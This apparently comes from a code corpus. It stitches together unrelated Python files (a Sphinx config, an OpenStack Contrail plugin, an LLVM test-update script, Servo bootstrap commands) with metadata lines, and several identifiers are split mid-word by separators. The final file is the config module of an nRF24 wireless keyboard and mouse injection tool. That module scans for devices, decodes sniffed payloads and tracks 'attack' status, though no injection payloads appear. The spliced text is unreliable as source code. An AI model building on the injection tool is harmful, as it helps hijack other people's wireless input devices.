if os.path.exists(os.path.join(path, cmd_name + '.exe')):
return os.path.join(path, cmd_name + '.exe')
return None
def is_py_package_installed(package):
"""
Utility checking whether a Python package is i
|
nstalled.
:param package: a Python package name
:return: True if it is installed, false otherwise.
"""
try:
installed_packages = subprocess.Popen(['pip', 'list'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
if package in str(installed_packages):
return True
return False
except OSError as e:
logger.warning("pip is not installed")
return False
def is_r_package_installed(package):
"""
Utility checking whether a R package is installed.
:param package: an R package name
:return: True if it is installed, false otherwise.
"""
try:
output = subprocess.Popen(['Rscript',
os.path.join(os.path.dirname(__file__), os.pardir, "is_package_installed.r"),
package],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
logger.debug("is sbpiper installed? " + str(output))
if "TRUE" in str(output):
return True
return False
except OSError as e:
logger.error("R is not installed")
return False
|
ulfaslak/bandicoot
|
immutable/docs/conf.py
|
Python
|
mit
| 8,601
| 0.005813
|
# -*- coding: utf-8 -*-
#
# bandicoot documentation build configuration file, created by
# sphinx-quickstart on Mon Apr 28 20:51:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import mozilla_sphinx_theme
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, '..')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'sphinx.ext.autosummary',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = False
napoleon_numpy_docstring = True
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bandicoot'
copyright = u'2014-2015, Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "mozilla"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [os.path.dirname(mozilla_sphinx_theme.__file__)]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_f
|
avicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin st
|
atic files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bandicootdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bandicoot.tex', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bandicoot', u'bandicoot Documentation',
[u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bandicoot', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'bandicoo
|
cloudwatt/contrail-neutron-plugin
|
neutron_plugin_contrail/plugins/opencontrail/contrail_plugin.py
|
Python
|
apache-2.0
| 28,349
| 0.000106
|
# Copyright 2014 Juniper Networks. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Hampapur Ajay, Praneet Bachheti, Rudra Rugge, Atul Moghe
from oslo.config import cfg
import requests
from neutron.api.v2 import attributes as attr
from neutron.common import exceptions as exc
from neutron.db import portbindings_base
from neutron.db import quota_db # noqa
from neutron.extensions import external_net
from neutron.extensions import portbindings
from neutron.extensions import securitygroup
from neutron import neutron_plugin_base_v2
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils as json
from neutron.openstack.common import log as logging
from simplejson import JSONDecodeError
LOG = logging.getLogger(__name__)
vnc_opts = [
cfg.StrOpt('api_server_ip', default='127.0.0.1',
help='IP address to connect to VNC controller'),
cfg.StrOpt('api_server_port', default='8082',
help='Port to connect to VNC controller'),
cfg.DictOpt('contrail_extensions', default={},
help='Enable Contrail extensions(policy, ipam)'),
]
# ContrailError message have translated already.
# so there is no need to use i18n here.
class ContrailNotFoundError(exc.NotFound):
message = '%(msg)s'
class ContrailConflictError(exc.Conflict):
message = '%(msg)s'
class ContrailBadRequestError(exc.BadRequest):
message = '%(msg)s'
class ContrailServiceUnavailableError(exc.ServiceUnavailable):
message = '%(msg)s'
class ContrailNotAuthorizedError(exc.NotAuthorized):
message = '%(msg)s'
class InvalidContrailExtensionError(exc.ServiceUnavailable):
message = _("Invalid Contrail Extension: %(ext_name) %(ext_class)")
CONTRAIL_EXCEPTION_MAP = {
requests.codes.not_found: ContrailNotFoundError,
requests.codes.conflict: ContrailConflictError,
requests.codes.bad_request: ContrailBadRequestError,
requests.codes.service_unavailable: ContrailServiceUnavailableError,
requests.codes.unauthorized: ContrailNotAuthorizedError,
requests.codes.request_timeout: ContrailServiceUnavailableError,
}
class NeutronPluginContrailCoreV2(neutron_plugin_base_v2.NeutronPluginBaseV2,
securitygroup.SecurityGroupPluginBase,
|
portbindings_base.PortBindingBaseMixin,
external_net.External_net):
supported_extension_aliases = ["security-group", "router",
"port-security", "binding", "agent",
"quotas", "external-net",
"allowed-address-pairs", "extra_dhcp_opt"]
PLUGIN_URL_PREFIX = '/neutron'
__native_bulk_support = False
# patch
|
VIF_TYPES
portbindings.__dict__['VIF_TYPE_VROUTER'] = 'vrouter'
portbindings.VIF_TYPES.append(portbindings.VIF_TYPE_VROUTER)
def _parse_class_args(self):
"""Parse the contrailplugin.ini file.
Opencontrail supports extension such as ipam, policy, these extensions
can be configured in the plugin configuration file as shown below.
Plugin then loads the specified extensions.
contrail_extensions=ipam:<classpath>,policy:<classpath>
"""
contrail_extensions = cfg.CONF.APISERVER.contrail_extensions
# If multiple class specified for same extension, last one will win
# according to DictOpt behavior
for ext_name, ext_class in contrail_extensions.items():
try:
if not ext_class:
LOG.error(_('Malformed contrail extension...'))
continue
self.supported_extension_aliases.append(ext_name)
ext_class = importutils.import_class(ext_class)
ext_instance = ext_class()
ext_instance.set_core(self)
for method in dir(ext_instance):
for prefix in ['get', 'update', 'delete', 'create']:
if method.startswith('%s_' % prefix):
setattr(self, method,
ext_instance.__getattribute__(method))
except Exception:
LOG.exception(_("Contrail Backend Error"))
# Converting contrail backend error to Neutron Exception
raise InvalidContrailExtensionError(
ext_name=ext_name, ext_class=ext_class)
#keystone
self._authn_token = None
if cfg.CONF.auth_strategy == 'keystone':
kcfg = cfg.CONF.keystone_authtoken
body = '{"auth":{"passwordCredentials":{'
body += ' "username": "%s",' % (kcfg.admin_user)
body += ' "password": "%s"},' % (kcfg.admin_password)
body += ' "tenantName":"%s"}}' % (kcfg.admin_tenant_name)
self._authn_body = body
self._authn_token = cfg.CONF.keystone_authtoken.admin_token
self._keystone_url = "%s://%s:%s%s" % (
cfg.CONF.keystone_authtoken.auth_protocol,
cfg.CONF.keystone_authtoken.auth_host,
cfg.CONF.keystone_authtoken.auth_port,
"/v2.0/tokens")
def __init__(self):
super(NeutronPluginContrailCoreV2, self).__init__()
portbindings_base.register_port_dict_function()
cfg.CONF.register_opts(vnc_opts, 'APISERVER')
self._parse_class_args()
def _get_base_binding_dict(self):
binding = {
portbindings.VIF_TYPE: portbindings.VIF_TYPE_VROUTER,
portbindings.VIF_DETAILS: {
# TODO(praneetb): Replace with new VIF security details
portbindings.CAP_PORT_FILTER:
'security-group' in self.supported_extension_aliases
}
}
return binding
def get_agents(self, context, filters=None, fields=None):
# This method is implemented so that horizon is happy
return []
def _request_api_server(self, url, data=None, headers=None):
# Attempt to post to Api-Server
response = requests.post(url, data=data, headers=headers)
if (response.status_code == requests.codes.unauthorized):
# Get token from keystone and save it for next request
response = requests.post(self._keystone_url,
data=self._authn_body,
headers={'Content-type': 'application/json'})
if (response.status_code == requests.codes.ok):
# plan is to re-issue original request with new token
auth_headers = headers or {}
authn_content = json.loads(response.text)
self._authn_token = authn_content['access']['token']['id']
auth_headers['X-AUTH-TOKEN'] = self._authn_token
response = self._request_api_server(url, data, auth_headers)
else:
raise RuntimeError('Authentication Failure')
return response
def _request_api_server_authn(self, url, data=None, headers=None):
authn_headers = headers or {}
if self._authn_token is not None:
authn_headers['X-AUTH-TOKEN'] = self._authn_token
response = self._request_api_server(url, data, headers=authn_headers)
return response
def _relay_request(self, url_path, data=None):
"""Send received request to api server."""
url = "http://%s:%s%s" % (cfg.CONF.APISERVER.api_server_ip,
cfg.CONF.APISERVER.api_server_port,
url_path)
|
google/llvm-propeller
|
llvm/utils/update_analyze_test_checks.py
|
Python
|
apache-2.0
| 6,940
| 0.010519
|
#!/usr/bin/env python3
"""A script to generate FileCheck statements for 'opt' analysis tests.
This script is a utility to update LLVM opt analysis test cases with new
FileCheck patterns. It can either update all of the tests in the file or
a single test function.
Example usage:
$ update_analyze_test_checks.py --opt=../bin/opt test/foo.ll
Workflow:
1. Make a compiler patch that requires updating some number of FileCheck lines
in regression test files.
2. Save the patch and revert it from your local work area.
3. Update the RUN-lines in the affected regression tests to look canonical.
Example: "; RUN: opt < %s -analyze -cost-model -S | FileCheck %s"
4. Refresh the FileCheck lines for either the entire file or select functions by
running this script.
5. Commit the fresh baseline of checks.
6. Apply your patch from step 1 and rebuild your local binaries.
7. Re-run this script on affected regression tests.
8. Check the diffs to ensure the script has done something reasonable.
9. Submit a patch including the regression test diffs for review.
A common pattern is to have the script insert complete checking of every
instruction. Then, edit it down to only check the relevant instructions.
The script is designed to make adding checks to a test case fast, it is *not*
designed to be authoratitive about what constitutes a good test!
"""
from __future__ import print_function
import argparse
import glob
import itertools
import os # Used to advertise this file's name ("autogenerated_note").
import string
import subprocess
import sys
import tempfile
import re
from UpdateTestChecks import common
ADVERT = '; NOTE: Assertions have been autogenerated by '
def main():
from argparse import RawTextHelpFormatter
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument('--opt-binary', default='opt',
help='The opt binary used to generate the test case')
parser.add_argument(
'--function', help='The function in the test file to update')
parser.add_argument('tests', nargs='+')
args = common.parse_commandline_args(parser)
script_name = os.path.basename(__file__)
autogenerated_note = (ADVERT + 'utils/' + script_name)
opt_basename = os.path.basename(args.opt_binary)
if (opt_basename != "opt"):
common.error('Unexpected opt name: ' + opt_basename)
sys.exit(1)
test_paths = [test for pattern in args.tests for test in glob.glob(pattern)]
for test in test_paths:
with open(test) as f:
input_lines = [l.rstrip() for l in f]
first_line = input_lines[0] if input_lines else ""
if 'autogenerated' in first_line and script_name not in first_line:
common.warn("Skipping test which wasn't autogenerated by " + script_name + ": " + test)
continue
if args.update_only:
if not first_line or 'autogenerated' not in first_line:
common.warn("Skipping test which isn't autogenerated: " + test)
continue
run_lines = common.find_run_lines(test, input_lines)
prefix_list = []
for l in run_lines:
if '|' not in l:
common.warn('Skipping unparseable RUN line: ' + l)
continue
(tool_cmd, filecheck_cmd) = tuple([cmd.strip() for cmd in l.split('|', 1)])
common.verify_filecheck_prefixes(filecheck_cmd)
if not tool_cmd.startswith(opt_basename + ' '):
common.warn('WSkipping non-%s RUN line: %s' % (opt_basename, l))
continue
if not filecheck_cmd.startswith('FileCheck '):
common.warn('Skipping non-FileChecked RUN line: ' + l)
continue
tool_cmd_args = tool_cmd[len(opt_basename):].strip()
tool_cmd_args = tool_cmd_args.replace('< %s', '').replace('%s', '').strip()
check_prefixes = [item for m in common.CHECK_PREFIX_RE.finditer(filecheck_cmd)
for item in m.group(1).split(',')]
if not check_prefixes:
check_prefixes = ['CHECK']
# FIXME: We should use multiple check prefixes to common check lines. For
# now, we just ignore all but the last.
prefix_list.append((check_prefixes, tool_cmd_args))
func_dict = {}
for prefixes, _ in prefix_list:
for prefix in prefixes:
func_dict.update({prefix: dict()})
for prefixes, opt_args in prefix_list:
common.debug('Extracted opt cmd:', opt_basename, opt_args, file=sys.stderr)
common.debug('Extracted FileCheck prefixes:', str(prefixes), file=sys.stderr)
raw_tool_outputs = common.invoke_tool(args.opt_binary, opt_args, test)
# Split analysis outputs by "Printing analysis " declarations.
for raw_tool_output in re.split(r'Printing analysis ', raw_tool_outputs):
common.build_function_body_dictionary(
common.ANALYZE_FUNCTION_RE, c
|
ommon.scrub_body, [],
raw_tool_output, prefixes, func_dict, args.verbose, False, False)
is_in_function = False
is_in_function_start = False
prefix_set = set([prefix for prefixes, _ in prefix_list for prefix in prefixes])
common.debug('Rewriting FileCheck prefixes:', str(prefix_set), file=sys.stderr)
output_lines = []
output_lines.append(autogenerated_note)
for input_line in input_lines:
if is_in_function_start:
|
if input_line == '':
continue
if input_line.lstrip().startswith(';'):
m = common.CHECK_RE.match(input_line)
if not m or m.group(1) not in prefix_set:
output_lines.append(input_line)
continue
# Print out the various check lines here.
common.add_analyze_checks(output_lines, ';', prefix_list, func_dict, func_name)
is_in_function_start = False
if is_in_function:
if common.should_add_line_to_output(input_line, prefix_set):
# This input line of the function body will go as-is into the output.
# Except make leading whitespace uniform: 2 spaces.
input_line = common.SCRUB_LEADING_WHITESPACE_RE.sub(r' ', input_line)
output_lines.append(input_line)
else:
continue
if input_line.strip() == '}':
is_in_function = False
continue
# Discard any previous script advertising.
if input_line.startswith(ADVERT):
continue
# If it's outside a function, it just gets copied to the output.
output_lines.append(input_line)
m = common.IR_FUNCTION_RE.match(input_line)
if not m:
continue
func_name = m.group(1)
if args.function is not None and func_name != args.function:
# When filtering on a specific function, skip all others.
continue
is_in_function = is_in_function_start = True
common.debug('Writing %d lines to %s...' % (len(output_lines), test))
with open(test, 'wb') as f:
f.writelines(['{}\n'.format(l).encode('utf-8') for l in output_lines])
if __name__ == '__main__':
main()
|
bheesham/servo
|
python/servo/bootstrap_commands.py
|
Python
|
mpl-2.0
| 12,893
| 0.002094
|
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
from __future__ import print_function, unicode_literals
import base64
import json
import os
import os.path as path
import re
import shutil
import subprocess
import sys
import StringIO
import tarfile
import urllib2
from distutils.version import LooseVersion
from mach.decorators import (
CommandArgument,
CommandProvider,
Command,
)
from servo.command_base import CommandBase, cd, host_triple, check_call, BIN_SUFFIX
def download(desc, src, writer):
print("Downloading %s..." % desc)
dumb = (os.environ.get("TERM") == "dumb") or (not sys.stdout.isatty())
try:
resp = urllib2.urlopen(src)
fsize = None
if resp.info().getheader('Content-Length'):
fsize = int(resp.info().getheader('Content-Length').strip())
recved = 0
chunk_size = 8192
while True:
chunk = resp.read(chunk_size)
if not chunk:
break
recved += len(chunk)
if not dumb:
if fsize is not None:
pct = recved * 100.0 / fsize
print("\rDownloading %s: %5.1f%%" % (desc, pct), end="")
sys.stdout.flush()
writer.write(chunk)
if not dumb:
print()
except urllib2.HTTPError, e:
print("Download failed (%d): %s - %s" % (e.code, e.reason, src))
sys.exit(1)
def download_file(desc, src, dst):
with open(dst, 'wb') as fd:
download(desc, src, fd)
def download_bytes(desc, src):
content_writer = StringIO.StringIO()
download(desc, src, content_writer)
return content_writer.getvalue()
def extract(src, dst, movedir=None):
tarfile.open(src).extractall(dst)
if movedir:
for f in os.listdir(movedir):
frm = path.join(movedir, f)
to = path.join(dst, f)
os.rename(frm, to)
os.rmdir(movedir)
os.remove(src)
@CommandProvider
class MachCommands(CommandBase):
@Command('env',
description='Print environment setup commands',
category='bootstrap')
def env(self):
env = self.build_env()
print("export PATH=%s" % env["PATH"])
if sys.platform == "darwin":
print("export DYLD_LIBRARY_PATH=%s" % env["DYLD_LIBRARY_PATH"])
else:
print("export LD_LIBRARY_PATH=%s" % env["LD_LIBRARY_PATH"])
@Command('bootstrap-rust',
description='Download the Rust compiler',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if a copy already exists')
def bootstrap_rustc(self, force=False):
rust_dir = path.join(
self.context.sharedir, "rust", self.rust_path())
if not force and path.exists(path.join(rust_dir, "rustc", "bin", "rustc" + BIN_SUFFIX)):
print("Rust compiler already downloaded.", end=" ")
print("Use |bootstrap-rust --force| to download again.")
return
if path.isdir(rust_dir):
shutil.rmtree(rust_dir)
os.makedirs(rust_dir)
date = self.rust_path().split("/")[0]
install_dir = path.join(self.context.sharedir, "rust", date)
# The Rust compiler is hosted on the nightly server under the date with a name
# rustc-nightly-HOST-TRIPLE.tar.gz. We just need to pull down and extract it,
# giving a directory name that will be the same as the tarball name (rustc is
# in that directory).
rustc_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s.tar.gz"
% self.rust_path())
tgz_file = rust_dir + '-rustc.tar.gz'
download_file("Rust compiler", rustc_url, tgz_file)
print("Extracting Rust compiler...")
extract(tgz_file, install_dir)
# Each Rust stdlib has a name of the form `rust-std-nightly-TRIPLE.tar.gz`, with
# a directory of the name `rust-std-TRIPLE` inside and then a `lib` directory.
# This `lib` directory needs to be extracted and merged with the `rustc/lib`
# directory from the host compiler above.
# TODO: make it possible to request an additional cross-target to add to this
# list.
stdlibs = [host_triple(), "arm-linux-androideabi"]
for target in stdlibs:
std_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s/rust-std-nightly-%s.tar.gz"
% (date, target))
tgz_file = install_dir + ('rust-std-nightly-%s.tar.gz' % target)
download_file("Host rust library for target %s" % target, std_url, tgz_file)
print("Extracting Rust stdlib for target %s..." % target)
extract(tgz_file, install_dir)
shutil.copytree(path.join(install_dir, "rust-std-nightly-%s" % target,
"rust-std-%s" % target, "lib", "rustlib", target),
path.join(install_dir, "rustc-nightly-%s" % host_triple(),
"rustc", "lib", "rustlib", target))
shutil.rmtree(path.join(install_dir, "rust-std-nightly-%s" % target))
print("Rust ready.")
@Command('bootstrap-rust-docs',
description='Download the Rust documentation',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if docs already exist')
def bootstrap_rustc_docs(self, force=False):
self.ensure_bootstrapped()
rust_root = self.config["tools"]["rust-root"]
docs_dir = path.join(rust_root, "doc")
if not force and path.
|
exists(docs_dir):
print("Rust docs already downloaded.", end=" ")
print("Use |bootstrap-rust-docs --force| to download again.")
ret
|
urn
if path.isdir(docs_dir):
shutil.rmtree(docs_dir)
docs_name = self.rust_path().replace("rustc-", "rust-docs-")
docs_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/rust-docs-nightly-%s.tar.gz"
% host_triple())
tgz_file = path.join(rust_root, 'doc.tar.gz')
download_file("Rust docs", docs_url, tgz_file)
print("Extracting Rust docs...")
temp_dir = path.join(rust_root, "temp_docs")
if path.isdir(temp_dir):
shutil.rmtree(temp_dir)
extract(tgz_file, temp_dir)
shutil.move(path.join(temp_dir, docs_name.split("/")[1],
"rust-docs", "share", "doc", "rust", "html"),
docs_dir)
shutil.rmtree(temp_dir)
print("Rust docs ready.")
@Command('bootstrap-cargo',
description='Download the Cargo build tool',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if cargo already exists')
def bootstrap_cargo(self, force=False):
cargo_dir = path.join(self.context.sharedir, "cargo",
self.cargo_build_id())
if not force and path.exists(path.join(cargo_dir, "cargo", "bin", "cargo" + BIN_SUFFIX)):
print("Cargo already downloaded.", end=" ")
print("Use |bootstrap-cargo --force| to download again.")
return
if path.isdir(cargo_dir):
shutil.rmtree(cargo_dir)
os.makedirs(cargo_dir)
tgz_file = "cargo-nightly-%s.tar.gz" % host_triple()
nightly_url = "https://static-rust-lang-org.s3.amazonaws.com/cargo-dist/%s/%s" % \
(self.cargo_build_id(), tgz_file)
download_file("Cargo nightly",
|
xswxm/nrf24-injection
|
utils/config.py
|
Python
|
gpl-3.0
| 8,406
| 0.022365
|
#!/usr/bin/env python2
'''
Author: xswxm
Blog: xswxm.com
This script will analyze the paylods/tasks assigned by the messager.py
and output the result to display.py.
It also stores most parameters, which are shared between different classes and scripts.
'''
import sys
sys.path.append("..")
from array import array
from utils import display
from utils.device import *
from lib import common
command = ''
devices = []
deviceID = None
menu = []
channel_time = None
strict_match = None
# Add a new device to the devices
def add_device(address, channel, payload):
from player import Player
def redo_scan(channel):
if Player.feature_ping < Player.last_ping:
global channel_time
# Pause Player correctly
while not Player._pause:
Player._flag.clear()
# Set channel
Player.channel = channel
common.radio.set_channel(channel)
# Set feature_ping to keep receiving payloads on this channel for few seconds
Player.feature_ping = Player.last_ping + common.timeout + channel_time
# Resume Player
Player._flag.set()
global devices
# Search in devices list
for i in range(len(devices)):
if address == devices[i].address:
# Update device's channels
if channel not in devices[i].channels:
devices[i].channels.append(channel)
devices[i].channels.sort()
# Update the device's payloads if it satifies the following requirements
if devices[i].model == None and len(payload) > 0 and payload not in devices[i].payloads:
devices[i].payloads.append(payload)
# Update device
devices[i] = match_device(address, devices[i].channels, devices[i].payloads)
# Keep scanning on this channel to verify the device if the device was not recognized
if devices[i].model == None:
redo_scan(channel)
else:
Player.feature_ping = Player.last_ping
break
# Add a new device to the devices
else:
payloads = []
if len(payload) > 0: payloads.append(payload)
devices.append(match_device(address, [channel], payloads))
# Found new device, keep scanning on this channel to verify the device
redo_scan(channel)
# Display the scanned the result
update_scanner_msg()
def update_scanner_msg():
global devices, menu
# Update selection limit
menu = range(len(devices))
msg = []
msg.append('----------------------------------SCAN DEVICES----------------------------------')
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
'No.', 'Address', 'Channels', 'Vendor', 'Model', 'Status'))
for i in range(len(devices)):
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in devices[i].address),
','.join(str(c) for c in devices[i].channels),
devices[i].vendor,
devices[i].model,
devices[i].status))
# Refresh display
display.refresh(msg)
def update_device(address, channel, payload):
global devices, deviceID
# Search in devices list
device = devices[deviceID]
# Update device's channels
if channel not in device.channels:
device.channels.append(channel)
device.channels.sort()
# Update device's payloads if it satifies the following requirements
if len(payload) > 0 and payload not in device.payloads:
device.payloads.append(payload)
# Update device
device = match_device(device.address, device.channels, device.payloads)
# Renew device
devices[deviceID] = device
if device.model != None:
# Pause player
from player import Player
Player._flag.set()
# # Update channels
# update_channels()
update_tasks_msg()
else:
update_matcher_msg()
def update_tasks_msg():
global devices, deviceID, menu
device = devices[deviceID]
|
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = range(2)
msg.append('{0:<6}{1}'.format('No.', 'Task'))
msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
# Refresh display
display.refresh(msg)
def update_matc
|
her_msg():
global devices, deviceID, menu
device = devices[deviceID]
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = []
# msg.append('{0:<6}{1}'.format('No.', 'Task'))
# msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
# msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
msg.append('')
msg.append('* Tasks is not avaliable right now because the device has not been located yet.')
msg.append('* It may take minites to locate the device, please wait...')
msg.append('')
#### Test Code For Monitoring payloads
l = len(device.payloads)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
msg.append('{0:<10}{1}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in device.payloads[i])))
####
# Refresh display
display.refresh(msg)
def update_sniffer_msg():
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('----------------------------------SNIFF PACKETS---------------------------------')
msg.append('{0:<10}{1} {2}'.format('Device: ', device.vendor, device.model))
msg.append('{0:<10}{1}'.format('Address: ', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<10}{1}'.format('Channels: ', ', '.join(str(c) for c in device.channels)))
payload = array('B', [])
# channel = None
from player import Player
if len(Player.records) > 0:
# channel = Player.records[0][0]
payload = Player.records[0][1]
del Player.records[0]
# msg.append('{0:<10}{1}'.format('Channel: ', channel))
msg.append('')
# Acquire the decoder path
decoder ='{0}.decode'.format(devices[deviceID].moduler)
try:
# Decode the payload
for m in eval(decoder)(payload):
msg.append(m)
except Exception as e:
msg.append(str(e))
# Refresh display
display.refresh(msg)
# The following method also has to been optimised
def update_attacker_msg(ping_rate=0):
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('----------------------------------LAUNCH ATTACK---------------------------------')
msg.append('{0:<9}{1} {2} {3}'.format('Device', ':', device.vendor, device.model))
msg.append('{0:<9}{1} {2}'.format('Address', ':', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<9}{1} {2}'.format('Channels', ':', ', '.join(str(c) for c in device.channels)))
from player import Player
status = len(Player.payloads) > 0 and 'Attacking...' or 'No attack request found.'
msg.append('{0:<9}{1} {2}'.format('Status', ':', status))
# Refresh ping rate
msg.append('{0:<9}{1} {2:<4}{3}'.format('Ping rate', ':', int(ping_rate), 'pks/s'))
msg.append('')
msg.append('----------------------------------ATTACK HISTORY--------------------------------')
msg.append('{0:<5}{1:<4}{2}'.format('No.', 'Ch.', 'Payload'))
l = len(Player.records)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
